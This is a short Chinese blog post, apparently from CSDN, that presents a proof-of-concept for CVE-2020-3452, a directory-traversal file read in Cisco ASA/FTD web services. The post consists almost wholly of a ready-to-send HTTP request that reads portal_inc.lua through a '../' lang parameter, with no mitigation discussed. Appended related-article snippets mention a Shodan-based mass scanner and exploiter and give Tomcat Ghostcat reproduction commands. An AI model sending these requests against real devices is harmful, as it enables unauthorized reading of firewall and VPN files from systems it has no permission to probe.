CVE-2020-3452(CISCO ASA设备任意文件读取漏洞复现)

最新推荐文章于 2023-11-12 20:14:55 发布
最新推荐文章于 2023-11-12 20:14:55 发布
阅读量1.4k 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44508748/article/details/109897678
版权

抓包
在这里插入图片描述
POC

GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

在这里插入图片描述

Min1996
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CISCO-CVE-2020-3452-Scanner-Exploiter:CISCO CVE-2020-3452 扫描器和漏洞利用程序
05-29
CISCO CVE-2020-3452 扫描器和漏洞利用程序 它将从 shodan 扫描目标服务器,然后找到存在 CVE-2020-3452(思科自适应安全设备和 FTD 未授权远程文件读取)的易受攻击的服务器。 关于 思科自适应安全设备 (ASA) 软件和思科 Firepower 威胁防御 (FTD) 软件的 Web 服务界面中存在一个漏洞,该漏洞可能允许未经身份验证的远程攻击者进行目录遍历攻击并读取目标系统上的敏感文件。 该漏洞是由于受影响设备处理的 HTTP 请求中的 URL 缺乏正确的输入验证。 攻击者可以通过向受影响的设备发送包含目录遍历字符序列的精心设计的HTTP请求来利用此漏洞。 成功的利用可能允许攻击者查看目标设备上 Web 服务文件系统中的任意文件。 当受影响的设备配置有 WebVPN 或 AnyConnect 功能时,将启用 Web 服务文件系统。 此漏洞不能用于获
CVE-2020-3452 CISCO ASA远程任意文件读取漏洞复现
tigerOrtiger的博客
07-24 5453
CVE-2020-3452 CISCO ASA远程任意文件读取漏洞 0x01 前言 昨天深夜4点cisco asa 爆出了CVE-2020-3452漏洞,此漏洞可以在未验证的情况下进行任意文件读取。 然后今天早上各大漏洞平台中找各种POC。 但是都只有漏洞通告 于是去推特上一看,已经有大佬把poc公布出来了。 推特是个好东西 :) LOL 0x02 漏洞信息 根据ciso官方通报的信息来看,【入口: 官方信息】 该漏洞是由于受影响的设备处理的HTTP请求中的URL缺乏正确的输入验证所致。攻击者可以通过将
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络进行攻击。 建议大家及时将 Weblogic 升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。
cisco设备信息泄漏漏洞案例【二】
合天网安学院
10-28 2651
前言上一篇文章介绍了cisco路由器设备的2个漏洞案例,这次补充cisco ip电话设备和安全设备漏洞案例。CISCO-UCM ConfigFileCacheList.txt 泄漏CISCO-UCM 全称Cisco Unified Communications Manager,是用于集成CISCO的语音视频通话、消息传递和移动协作的基础设施部分 CUCM 服务器在端口 TCP/6970 上有一个...
CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)
Zeker62的博客
12-23 3947
漏洞内容 文件读取漏洞概述: 文件读取漏洞就是攻击者利用漏洞,可以越级对服务器端文件其他目录进行访问,以此来达到破坏、越权、获取信息等目的。 本漏洞内容: 思科自适应安全设备 Cisco Adaptive Security Appliance (ASA) 软件和思科火力威胁防御 Cisco Firepower Threat Defense (FTD) 软件的 Web 服务界面中存在漏洞,使得未经身份验证的远程攻击者能够执行目录遍历攻击并读取目标系统上的敏感文件。 简而言之,思科代码对恶意URL的注入过滤
复现CVE-2020-3452CISCO ASA远程任意文件读取
记录并分享学习安全的知识点..
04-27 1044
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、漏洞描述 Cisco官方 发布了 Cisco ASA 软件和 FTD 软件的 Web 接口存在目录遍历导致任意文件读取 的风险通告,该漏洞编号为 CVE-2020-3452。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。 漏洞等级:中危。 二、影响版本 Cisco ASA:<= 9.6 Cisco ASA:9.7 ,...
python工具CISCO ASA设备任意文件读取
最新发布
众生度尽,方证菩提
11-12 156
各家兴便是天下大同
目录遍历漏洞_关于 Cisco ASA/FTD 目录遍历漏洞的安全告知
weixin_40008644的博客
12-16 288
2020年7月22日,Cisco 发布安全公告,修复了一个Adaptive Security Appliance(ASA)和Firepower Threat Defense(FTD)软件的目录遍历漏洞(CVE-2020-3452)。漏洞详情Cisco Adaptive Security Appliances Software 是一套防火墙和网络安全平台。该平台主要用于对数据和网络资源的高...
CISCO ASA远程任意文件读取漏洞CVE-2020-3452复现
锋刃科技的博客
07-30 2857
简介 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。 影响版本 Cisco ASA 设备影响版本: <9.6.1 9.6 < 9.6.4.42 9.71 9.8
CVE-2020-3452漏洞复现
windy_ll的博客
11-21 3071
一、前言     前端时间碰到了该漏洞,记录一下! 二、漏洞介绍     该漏洞为思科ASA设备和FTD设备的未授权任意文件读取漏洞,但仅能读取到WEB目录下的文件,影响版本如下: Cisco ASA:<= 9.6 Cisco ASA:9.7 , 9.8 , 9.9 , 9.10 , 9.12 , 9.13 , 9.14 Cisco FTD:6.2.2 , 6.2.3 , 6.3.0 , 6.4.0 , 6.5.0 , 6.6.0 三、漏洞复现     首先利用zoomeye或者f
【Tryhackme】Hacker+of+the+Hill+#1
hyun134340的博客
01-05 1243
我们看到至少有三个文件夹,shell这个文件夹应该有有趣的东西,但是重定向到了login api文件夹可以正常打开,打印了一串json,暴露出来Apache,php,mysql的版本号,数据库名字:servermanager。查看/etc/passwd我们知道admin是系统里的期中一个用户,由于我们已经知道admin的密码,这个时候本来可以直接su admin 然而这个系统并没有su 命令,这个时候可以使用ssh来转换角色。爆破admin账号不成功,sql注入也没有结果。
CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)
thelostworld
07-23 1079
CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452) 一、漏洞描述: Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。 二、影响范围 以下是CVE-2020-3452漏洞受.
Apache Spark 未授权访问漏洞
weixin_44508748的博客
12-14 3534
Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动ACL(访问控制),我们将可以在集群中执行任意代码。 本次复现使用docker+vulhub一键搭建: docker-compose up -d 环境启动后,会自动启用四个端口:8080,8081,6066,7077 他们分别为: master的管理页面:http://your-ip:8080 slave的管理页面:http://your-ip:8081 standalone模式下,maste
Tomact_CVE-2020-1938漏洞复现
08-31
复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上搭建环境:确保攻击机上已经安装了Tomcat服务器,并且版本在3.4.3以下,可以使用以下命令下载并安装Tomcat 3.4.3版本: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 3. 配置Tomcat服务器:在Tomcat安装目录下,找到server.xml文件,在<Connector>标签中添加以下内容: protocol="org.apache.coyote.ajp.AjpNio2Protocol" secretRequired="false" 4. 启动Tomcat服务器:在Tomcat安装目录下运行启动脚本,如./catalina.sh run 5. 复现漏洞:使用以下命令触发漏洞复现: python3 file_include.py -u http://目标IP:目标端口/ -p /WEB-INF/web.xml 以上步骤可以帮助你复现Tomact_CVE-2020-1938漏洞。请注意,在进行漏洞复现时务必遵守道德规范,并获得合法授权进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2020-1938 漏洞复现](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-1938 Tomcat文件包含漏洞复现](https://blog.csdn.net/qq_49279082/article/details/129018726)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值